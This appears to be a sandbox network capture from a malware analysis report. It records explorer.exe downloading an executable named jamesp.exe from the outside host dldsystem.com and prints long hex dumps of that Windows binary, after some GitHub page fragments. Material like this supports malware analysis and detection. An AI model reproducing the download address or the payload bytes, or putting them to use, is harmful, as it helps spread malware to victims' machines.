                                                                                                                                  Data Ascii: component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.
                                                                                                                                  2022-10-17 20:07:12 UTC644INData Raw: 64 3d 22 4d 33 2e 37 32 20 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 4c 38 20 36 2e 39 34 6c 33 2e 32 32 2d 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 36 20 31 2e 30 36 4c 39 2e 30 36 20 38 6c 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 4c 38 20 39 2e 30 36 6c 2d 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 4c 36 2e 39 34 20 38 20 33 2e 37 32 20 34 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 63 74 6f 63 61 74 2d 73 70 69 6e 6e 65 72 20 6d 79 2d 36
                                                                                                                                  Data Ascii: d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6
                                                                                                                                  2022-10-17 20:07:12 UTC646INData Raw: 32 31 36 20 30 20 31 36 20 2e 37 38 34 20 31 36 20 31 2e 37 35 76 37 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 31 34 2e 32 35 20 31 31 68 2d 37 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 35 20 39 2e 32 35 76 2d 37 2e 35 7a 6d 31 2e 37 35 2d 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 37 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 37 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30
                                                                                                                                  Data Ascii: 216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.549708162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:16 UTC646OUTGET /jamesp.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: dldsystem.com
                                                                                                                                  2022-10-17 20:07:17 UTC646INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:16 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 20:01:04 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 418816
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-10-17 20:07:17 UTC647INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 2e 52 17 91 4f 3c 44 91 4f 3c 44 91 4f 3c 44 85 24 3f 45 9c 4f 3c 44 85 24 39 45 37 4f 3c 44 85 24 38 45 87 4f 3c 44 85 24 3d 45 92 4f 3c 44 91 4f 3d 44 cd 4f 3c 44 f1 35 38 45 80 4f 3c 44 f1 35 3f 45 87 4f 3c 44 f1 35 39 45 dc 4f 3c 44 f5 35 35 45 90 4f 3c 44 f5 35 3e 45 90 4f 3c 44 52 69 63 68 91 4f 3c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$.RO<DO<DO<D$?EO<D$9E7O<D$8EO<D$=EO<DO=DO<D58EO<D5?EO<D59EO<D55EO<D5>EO<DRichO<DPEL
                                                                                                                                  2022-10-17 20:07:17 UTC654INData Raw: 83 ff 10 89 75 e0 8d 45 d0 0f 43 45 d0 c6 04 30 00 eb 43 8b 4d e4 8b fe 89 c8 2b fa 2b c2 3b f8 77 21 89 75 e0 83 f9 10 8d 75 d0 0f 43 75 d0 57 03 f2 6a 00 56 e8 6f 67 00 00 83 c4 0c c6 04 3e 00 eb 13 6a 00 57 c6 45 cc 00 8d 4d d0 ff 75 cc 57 e8 a3 26 00 00 83 7d e4 10 8d 7d d0 f2 0f 10 45 1c 0f 43 7d d0 83 ec 08 8b 45 c0 8b 75 e0 f2 0f 11 04 24 ff 75 c4 ff 70 14 8d 45 e8 6a 4c 50 ff 75 bc e8 c1 16 00 00 83 c4 10 50 56 57 e8 96 e5 ff ff 83 7d e4 10 8d 4d d0 8b 75 b8 0f 43 4d d0 50 51 ff 75 18 ff 75 c0 ff 75 10 ff 75 0c 56 ff 75 bc e8 41 12 00 00 8b 4d e4 83 c4 38 83 f9 10 72 28 8b 55 d0 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 29 51 52 e8 6f 4f 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd
                                                                                                                                  Data Ascii: uECE0CM++;w!uuCuWjVog>jWEMuW&}}EC}Eu$upEjLPuPVW}MuCMPQuuuuVuAM8r(UArP#+w)QRoOMdY_^M3
                                                                                                                                  2022-10-17 20:07:17 UTC662INData Raw: 35 42 00 64 a1 00 00 00 00 50 83 ec 08 56 a1 18 20 43 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8b 06 8b 40 04 8b 44 30 30 8b 48 04 89 4d f0 8b 01 ff 50 04 8d 45 ec c7 45 fc 00 00 00 00 50 e8 53 fb ff ff 83 c4 04 89 c1 8b 10 6a 0a 8b 42 20 ff d0 c7 45 fc ff ff ff ff 8b 4d f0 88 45 08 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 8b c8 6a 01 ff 12 ff 75 08 8b ce e8 b9 0a 00 00 8b ce e8 92 f8 ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 55 8b ec 6a ff 68 04 36 42 00 64 a1 00 00 00 00 50 83 ec 48 a1 18 20 43 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 5d 08 8d 4d e8 6a 00 89 5d ec e8 7d 0d 00 00 c7 45 fc 00 00 00 00 8b 3d 14 65 46 00 a1 04 65 46 00 89 45 e0 85 ff 75 2f 57 8d 4d e4 e8 5b 0d 00 00 39 3d 14 65 46 00 75 10 a1
                                                                                                                                  Data Ascii: 5BdPV C3PEdu@D00HMPEEPSjB EMEtPtjuMdY^]Ujh6BdPH C3ESVWPEd]Mj]}E=eFeFEu/WM[9=eFu
                                                                                                                                  2022-10-17 20:07:17 UTC670INData Raw: 14 8b 07 53 8b 70 10 8b ce ff 15 38 41 42 00 8b cf ff d6 8b c3 5e 5b 5f c3 83 c8 ff c3 55 8b ec 51 8b 45 10 53 8b d9 57 8b 7d 0c 85 c0 7f 0f 7c 04 85 ff 75 09 33 c0 33 d2 e9 c1 00 00 00 83 7b 38 00 74 0f 50 57 ff 75 08 e8 b7 00 00 00 e9 ac 00 00 00 8b 43 1c 56 8b f7 8b 08 85 c9 74 3b 8b 43 2c 8b 00 89 45 fc 85 c0 74 2f 3b c7 72 05 8b c7 89 7d fc 50 51 ff 75 08 e8 2b 23 00 00 8b 4d fc 83 c4 0c 8b 45 08 2b f1 03 c1 89 45 fc 8b 43 2c 29 08 8b 43 1c 01 08 eb 06 8b 45 08 89 45 fc 83 7b 4c 00 74 4e 8b cb e8 e5 f7 ff ff 8b 4d fc 8b d6 b8 ff 0f 00 00 3b f0 76 24 ff 73 4c 50 6a 01 51 e8 73 78 00 00 8b 4d fc 2b f0 03 c8 83 c4 10 89 4d fc 8b d6 3d ff 0f 00 00 75 17 eb d3 85 d2 74 11 ff 73 4c 56 6a 01 51 e8 4b 78 00 00 83 c4 10 2b f0 8b 55 10 2b fe 8b c7 83 da 00 5e
                                                                                                                                  Data Ascii: Sp8AB^[_UQESW}|u33{8tPWuCVt;C,Et/;r}PQu+#ME+EC,)CEE{LtNM;v$sLPjQsxM+M=utsLVjQKx+U+^
                                                                                                                                  2022-10-17 20:07:17 UTC678INData Raw: 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d f8 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 02 ef ff ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 9f 2c 00 00 83 c4 20 5e 5d c3 55 8b ec 8b 4d 0c 56 8b 75 08 89 0e e8 a3 23 00 00 8b 48 24 89 4e 04 e8 98 23 00 00 89 70 24 8b c6 5e 5d c3 55 8b ec 56 e8 87 23 00 00 8b 75 08 3b 70 24 75 0e 8b 76 04 e8 77 23 00 00 89 70 24 5e 5d c3 e8 6c 23 00 00 8b 48 24 83 c1 04 eb 07 3b f0 74 0b 8d 48 04 8b 01 85 c0 74 09 eb f1 8b 46 04 89 01 eb da e8 a1 6c 00 00 cc 55 8b ec 51 53 fc 8b 45 0c 8b 48 08 33 4d 0c e8 63 ee ff ff 8b 45 08 8b 40 04 83 e0 66 74 11 8b 45 0c c7 40 24 01 00 00 00 33 c0 40 eb 6c eb 6a 6a 01 8b 45 0c ff 70 18
                                                                                                                                  Data Ascii: E@MAd=];d_^[UVuN3jVvvjuvu, ^]UMVu#H$N#p$^]UV#u;p$uvw#p$^]l#H$;tHtFlUQSEH3McE@ftE@$3@ljjEp
                                                                                                                                  2022-10-17 20:07:17 UTC686INData Raw: b6 42 f4 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e5 f4 ff ff 8b 46 f5 3b 42 f5 0f 84 87 00 00 00 0f b6 c8 0f b6 42 f5 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 b8 f4 ff ff 0f b6 4e f6 0f b6 42 f6 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 96 f4 ff ff 0f b6 4e f7 0f b6 42 f7 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 74 f4 ff ff 0f b6 4e f8 0f b6 42 f8 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 52 f4 ff ff 8b 46 f9 3b 42 f9 0f 84 01 f8 ff ff 0f b6 42 f9 0f b6 4e f9 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 24 f4 ff ff 0f b6 4e fa 0f b6 42 fa 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 02 f4 ff
                                                                                                                                  Data Ascii: B+t3EF;BB+t3ENB+t3ENB+t3EtNB+t3ERF;BBN+t3E$NB+t3E
                                                                                                                                  2022-10-17 20:07:17 UTC693INData Raw: 45 fc 3b 47 10 72 07 89 47 10 b0 01 eb 02 32 c0 83 3e 00 75 06 85 db 74 02 89 1e 5f 5e 5b c9 c2 04 00 8b ff 53 56 8b f1 8d 8e 48 04 00 00 e8 dd 0a 00 00 84 c0 74 1b 33 db 39 5e 10 0f 85 c8 00 00 00 e8 8d 2e 00 00 c7 00 16 00 00 00 e8 78 0f 00 00 83 c8 ff 5e 5b c3 89 5e 38 89 5e 1c e9 85 00 00 00 ff 46 10 39 5e 18 0f 8c 8c 00 00 00 ff 76 1c 0f b6 46 31 8b ce 50 e8 8c fe ff ff 89 46 1c 83 f8 08 74 bc 83 f8 07 77 c7 ff 24 85 6d c8 40 00 8b ce e8 ea 00 00 00 eb 45 83 4e 28 ff 89 5e 24 88 5e 30 89 5e 20 89 5e 2c 88 5e 3c eb 38 8b ce e8 8f 00 00 00 eb 27 8b ce e8 16 05 00 00 eb 1e 89 5e 28 eb 21 8b ce e8 62 01 00 00 eb 10 8b ce e8 7f 01 00 00 eb 07 8b ce e8 c4 02 00 00 84 c0 0f 84 6a ff ff ff 8b 46 10 8a 00 88 46 31 84 c0 0f 85 6b ff ff ff ff 46 10 8b ce e8 29
                                                                                                                                  Data Ascii: E;GrG2>ut_^[SVHt39^.x^[^8^F9^vF1PFtw$m@EN(^$^0^ ^,^<8'^(!bjFF1kF)
                                                                                                                                  2022-10-17 20:07:17 UTC701INData Raw: 48 04 83 60 08 00 89 08 8b 45 08 8b 40 0c 90 c1 e8 02 a8 01 8b 45 08 74 0b 6a fc 59 83 c0 0c f0 21 08 eb 23 8b 40 0c 90 83 e0 41 3c 41 75 18 8b 45 08 8b 40 0c 90 c1 e8 08 a8 01 75 0a 8b 45 08 c7 40 18 00 02 00 00 8b 45 08 8b 40 10 90 56 57 53 50 e8 4e 9a 00 00 23 c2 83 c4 10 83 f8 ff 75 04 0b c0 eb 02 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a8 fd ff ff 83 c4 10 5d c3 6a 0c 68 40 13 43 00 e8 b6 9d ff ff 83 65 e4 00 8b 45 08 ff 30 e8 76 f2 ff ff 59 83 65 fc 00 8b 4d 0c e8 34 00 00 00 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 17 00 00 00 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 75 e4 8b 45 10 ff 30 e8 4b f2 ff ff 59 c3 8b ff 55 8b ec 51 56 8b f1 57 8b 06 8b 38 57 e8 8b 62 00 00 88 45 fc 8b 06 ff 30 8b 46
                                                                                                                                  Data Ascii: H`E@EtjY!#@A<AuE@uE@E@VWSPN#u3_^[]Uuuuu]jh@CeE0vYeM4uEMdY_^[uE0KYUQVW8WbE0F
                                                                                                                                  2022-10-17 20:07:17 UTC709INData Raw: 65 e8 e8 d9 24 00 00 cc 8b ff 55 8b ec 33 c0 81 7d 08 63 73 6d e0 0f 94 c0 5d c3 8b ff 55 8b ec 83 ec 18 83 7d 10 00 75 12 e8 93 00 00 00 84 c0 74 09 ff 75 08 e8 ca 00 00 00 59 8d 45 0c c6 45 ff 00 89 45 e8 8d 4d fe 8d 45 10 89 45 ec 8d 45 ff 6a 02 89 45 f0 58 89 45 f8 89 45 f4 8d 45 f8 50 8d 45 e8 50 8d 45 f4 50 e8 54 fe ff ff 83 7d 10 00 74 02 c9 c3 ff 75 08 e8 01 00 00 00 cc 8b ff 55 8b ec e8 5d a3 00 00 83 f8 01 74 20 64 a1 30 00 00 00 8b 40 68 c1 e8 08 a8 01 75 10 ff 75 08 ff 15 4c 40 42 00 50 ff 15 50 40 42 00 ff 75 08 e8 4e 00 00 00 59 ff 75 08 ff 15 a0 40 42 00 cc 6a 00 ff 15 3c 40 42 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0
                                                                                                                                  Data Ascii: e$U3}csm]U}utuYEEEMEEEjEXEEEPEPEPT}tuU]t d0@huuL@BPP@BuNYu@Bj<@Bt4MZf9u*H<9PEuf9Auytvt
                                                                                                                                  2022-10-17 20:07:17 UTC717INData Raw: 85 f4 fd ff ff 50 e8 0e 6f ff ff 33 c9 83 c4 0c 85 c0 0f 94 c1 eb 06 8b 8d 44 fd ff ff 89 4e 04 8b 47 08 89 06 8b 46 04 89 47 18 eb 1e 83 fb 01 75 0b 8b 85 38 fd ff ff 89 47 10 eb 0e 83 fb 05 75 09 8b 85 38 fd ff ff 89 47 14 6b c3 0c 57 8b b0 90 75 42 00 8b ce ff 15 38 41 42 00 ff d6 59 8b 8d 34 fd ff ff 85 c0 74 4a 8b 85 3c fd ff ff 89 0c 38 ff b4 9f a0 00 00 00 e8 a9 0f 00 00 8b 8d 30 fd ff ff 8b 85 20 fd ff ff 51 89 84 9f a0 00 00 00 e8 90 0f 00 00 8b 85 1c fd ff ff 59 59 89 47 08 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 4c 52 ff ff c9 c3 81 f9 58 22 43 00 74 4a 8b f3 83 c9 ff 03 f6 8b 44 f7 28 f0 0f c1 08 75 39 ff 74 f7 28 e8 52 0f 00 00 ff 74 f7 24 e8 49 0f 00 00 ff b4 9f a0 00 00 00 e8 3d 0f 00 00 8b 85 3c fd ff ff 83 c4 0c 8b 8d 44 fd ff ff 89 0c 38 89 8c
                                                                                                                                  Data Ascii: Po3DNGFGu8Gu8GkWuB8ABY4tJ<80 QYYG3M_^3[LRX"CtJD(u9t(Rt$I=<D8
                                                                                                                                  2022-10-17 20:07:17 UTC725INData Raw: 04 83 7d 18 02 75 14 80 39 30 75 0f 6a 03 8d 41 01 50 51 e8 d1 48 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 e9 f5 fe ff ff 33 c0 50 50 50 50 50 e8 b9 92 ff ff cc 8b ff 55 8b ec 83 ec 0c 33 c0 56 57 ff 75 18 8d 7d f4 ff 75 14 ab ab ab 8d 45 f4 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 c1 a9 00 00 83 c9 ff 83 c4 18 8b d0 39 4d 10 74 0e 8b 4d 10 33 c0 83 7d f4 2d 0f 94 c0 2b c8 ff 75 24 8b 75 0c 8d 45 f4 52 50 8b 45 f8 03 c7 50 33 c0 83 7d f4 2d 51 0f 94 c0 03 c6 50 e8 a7 a8 00 00 83 c4 18 85 c0 74 05 c6 06 00 eb 16 ff 75 20 8d 45 f4 6a 00 50 57 ff 75 10 56 e8 07 00 00 00 83 c4 18 5f 5e c9 c3 8b ff 55 8b ec 83 ec 14 8d 4d ec 53 56 57 ff 75 1c e8 d1 7f ff ff 8b 5d 14 33 d2 8b 75 10 8b 7d 08 8b 4b 04 49 38 55 18 74 14 3b ce 75 10 33
                                                                                                                                  Data Ascii: }u90ujAPQH}tEP33PPPPPU3VWu}uE}PEWp09MtM3}-+u$uERPEP3}-QPtu EjPWuV_^UMSVWu]3u}KI8Ut;u3
                                                                                                                                  2022-10-17 20:07:17 UTC732INData Raw: ff ff ff 8d 8d 74 ff ff ff 89 7d cc 0f 94 c0 40 51 50 89 45 dc 8d 45 cc 50 8d 45 b8 50 e8 a5 87 00 00 83 c4 10 83 f8 ff 0f 84 af 01 00 00 8b 75 d4 4f 03 fe eb 7f 8a 54 01 2d f6 c2 04 74 1e 8a 44 01 2e 80 e2 fb 88 45 ec 8a 07 88 45 ed 8b 45 d4 6a 02 88 54 01 2d 8d 45 ec 50 eb 43 8a 07 88 45 e3 e8 49 8b ff ff 0f b6 4d e3 66 39 1c 48 7d 2c 8d 47 01 89 45 cc 3b 45 a4 0f 83 31 01 00 00 6a 02 8d 45 b8 57 50 e8 10 d3 ff ff 83 c4 0c 83 f8 ff 0f 84 45 01 00 00 8b 7d cc eb 18 6a 01 57 8d 45 b8 50 e8 f3 d2 ff ff 83 c4 0c 83 f8 ff 0f 84 28 01 00 00 53 53 6a 05 8d 45 e4 47 50 ff 75 dc 8d 45 b8 89 7d 9c 50 53 ff 75 88 e8 73 42 00 00 83 c4 20 89 45 cc 85 c0 0f 84 fe 00 00 00 53 8d 4d a0 51 50 8d 45 e4 50 ff 75 94 ff 15 b0 40 42 00 85 c0 0f 84 da 00 00 00 8b 75 b0 2b 75
                                                                                                                                  Data Ascii: t}@QPEEPEPuOT-tD.EEEjT-EPCEIMf9H},GE;E1jEWPE}jWEP(SSjEGPuE}PSusB ESMQPEPu@Bu+u
                                                                                                                                  2022-10-17 20:07:17 UTC740INData Raw: 6a 01 ff 70 08 e8 7e 23 00 00 83 c4 18 85 c0 0f 85 39 ff ff ff e8 3a 73 ff ff c7 00 2a 00 00 00 33 c0 66 89 07 eb 41 39 b0 a8 00 00 00 75 11 8b 75 0c 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 eb 28 56 56 83 ce ff 56 ff 75 0c 6a 09 51 e8 37 23 00 00 83 c4 18 85 c0 75 0d e8 f7 72 ff ff c7 00 2a 00 00 00 eb 03 8d 70 ff 80 7d f0 00 74 0a 8b 4d e4 83 a1 50 03 00 00 fd 8b c6 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 10 56 57 8b 7d 0c 33 f6 85 ff 75 3b 85 db 75 3b 85 ff 74 05 33 c0 66 89 07 8b 45 08 85 c0 74 02 89 30 ff 75 1c 8d 4d f0 e8 80 41 ff ff 8b c3 39 5d 18 77 03 8b 45 18 3d ff ff ff 7f 76 1e e8 87 72 ff ff 6a 16 eb 58 85 db 75 c5 e8 7a 72 ff ff 6a 16 5e 89 30 e8 66 53 ff ff eb 72 8d 4d f4 51 50 ff 75 14 57 e8 e8 fd ff ff 83 c4 10 83 f8 ff 75 12 85 ff 74
                                                                                                                                  Data Ascii: jp~#9:s*3fA9uuNFu+(VVVujQ7#ur*p}tMP_^[US]VW}3u;u;t3fEt0uMA9]wE=vrjXuzrj^0fSrMQPuWut
                                                                                                                                  2022-10-17 20:07:17 UTC748INData Raw: 00 00 8d a4 24 00 00 00 00 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 00 de c1 c3 8d a4 24 00 00 00 00 90 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 01 de c1 c3 90 dd d8 dd d8 db 2d b0 84 42 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 8d 49 00 dd d8 dd d8 db 2d c4 84 42 00 0a ed 74 02 d9 e0 0a c9 74 08 dd 05 d6 84 42 00 de c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 c4 e0 89 45 e0 8b 45 18 89 45 f0 8b 45 1c 89 45 f4 eb 09 55 8b ec 83 c4 e0 89 45 e0 dd 5d f8 89 4d e4 8b 45 10 8b 4d 14 89 45 e8 89 4d ec 8d 45 08 8d
                                                                                                                                  Data Ascii: $bbi@tpp$bbi@t bbi@tpp-BppI-BttBtUEEEEEUE]MEMEME
                                                                                                                                  2022-10-17 20:07:17 UTC756INData Raw: ff 59 89 75 fc 8b fe a1 f8 62 46 00 89 7d e0 39 45 08 7c 1f 39 34 bd f8 60 46 00 75 31 e8 ed fe ff ff 89 04 bd f8 60 46 00 85 c0 75 14 6a 0c 5e 89 75 e4 c7 45 fc fe ff ff ff e8 15 00 00 00 eb a2 a1 f8 62 46 00 83 c0 40 a3 f8 62 46 00 47 eb bb 8b 75 e4 6a 07 e8 64 16 ff ff 59 c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d f8 60 46 00 50 ff 15 08 40 42 00 5d c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d f8 60 46 00 50 ff 15 0c 40 42 00 5d c3 8b ff 55 8b ec 53 56 8b 75 08 57 85 f6 78 67 3b 35 f8 62 46 00 73 5f 8b c6 8b fe 83 e0 3f c1 ff 06 6b d8 38 8b 04 bd f8 60 46 00 f6 44 03 28 01 74 44 83 7c 03 18 ff 74 3d e8 c3 4f ff ff 83 f8 01 75 23 33 c0 2b f0 74 14 83 ee 01 74 0a 83 ee 01 75 13 50 6a f4 eb 08 50 6a f5 eb
                                                                                                                                  Data Ascii: YubF}9E|94`Fu1`Fuj^uEbF@bFGujdYUE?k8`FP@B]UE?k8`FP@B]USVuWxg;5bFs_?k8`FD(tD|t=Ou#3+ttuPjPj
                                                                                                                                  2022-10-17 20:07:17 UTC764INData Raw: 59 59 85 c0 75 1f 57 33 db 53 56 e8 63 02 00 00 83 c4 0c 85 c0 74 0e 81 0f 00 01 00 00 39 5f 04 75 03 89 77 04 8b 07 c1 e8 02 f7 d0 83 e0 01 eb 05 33 c0 89 07 40 8b 4d fc 5f 5e 33 cd 5b e8 3b 97 fe ff c9 c2 04 00 8b ff 55 8b ec 81 ec f4 00 00 00 a1 18 20 43 00 33 c5 89 45 fc 53 56 8b 75 08 57 e8 e8 5a ff ff 8b d8 e8 e1 5a ff ff 56 8b b8 4c 03 00 00 e8 a2 00 00 00 59 8b 4b 60 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 02 f0 ff ff 50 81 c1 01 10 00 00 51 56 ff 15 d0 40 42 00 85 c0 75 05 21 07 40 eb 61 8d 85 0c ff ff ff 50 ff 73 50 e8 be c6 ff ff 59 59 8b 4b 60 85 c0 75 09 85 c9 75 32 57 6a 01 eb 20 85 c9 75 32 39 4b 5c 74 2d 8d 85 0c ff ff ff 50 ff 73 50 e8 94 c6 ff ff 59 59 85 c0 75 18 57 50 56 e8 82 01 00 00 83 c4 0c 85 c0 74 09 83 0f 04 89 77 04 89
                                                                                                                                  Data Ascii: YYuW3SVct9_uw3@M_^3[;U C3ESVuWZZVLYK`jxPQV@Bu!@aPsPYYK`uu2Wj u29K\t-PsPYYuWPVtw
                                                                                                                                  2022-10-17 20:07:17 UTC772INData Raw: f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 97 e3 fe ff 83 c4 10 32 c0 e9 22 ff ff ff 83 a5 9c f6 ff ff 00 83 a5 2c fe ff ff 00 6a 00 eb 0f 33 c0 50 89 85 2c fe ff ff 89 85 9c f6 ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 58 e3 fe ff 83 c4 10 8b 8d 2c fe ff ff 8b bd 9c f8 ff ff 89 bd b8 f8 ff ff 85 c9 74 7a 83 a5 b4 f8 ff ff 00 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 85 b4 f8 ff ff 89 84 bd 30 fe ff ff 83 d2 00 47 89 95 b4 f8 ff ff 3b f9 75 d9 8b bd b8 f8 ff ff 85 d2 74 40 8b 85 2c fe ff ff 83 f8 73 73 0f 89 94 85 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 56 50 e8 c8 e2 fe ff 83 c4 10 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 c7
                                                                                                                                  Data Ascii: ,P0VP2",j3P,P0VPX,tz30jZ0G;ut@,ss0,&3P,P0VP\P,P
